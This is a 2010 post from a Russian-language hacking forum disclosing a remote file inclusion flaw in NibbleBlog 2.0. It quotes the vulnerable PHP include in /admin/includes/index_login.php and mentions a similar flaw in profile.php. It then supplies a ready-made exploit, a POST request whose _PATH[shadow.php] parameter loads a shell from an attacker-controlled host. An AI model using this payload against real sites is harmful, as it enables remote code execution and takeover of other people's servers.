03.06.2010, 13:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
NibbleBlog 2.0 Remote File Inclusion
NibbleBlog 2.0
Site: http://www.nibbleblog.com
Remote File Inclusion
Vuln file: /admin/includes/index_login.php
PHP код:
if($var_url['exe']=='login')
{
$var_form['login_user'] = (string) $_POST['form_field_user'];
$var_form['login_password'] = (string) $_POST['form_field_password'];
if( !empty($var_form['login_user']) && !empty($var_form['login_password']) )
{
include($_PATH['shadow.php']);
/*...*/
Подобная уязвимость в /admin/includes/profile.php
Need: register_globals = On
Exploit:
Код:
POST http://[host]/[path]/admin/includes/index_login.php HTTP/1.0
Content-type: application/x-www-form-urlencoded
var_url[exe]=login&form_field_user=1&form_field_password=1&_PATH[shadow.php]=http://[evil_host]/shell.wtf
__________________
Avant que l'ombre...
|
|
|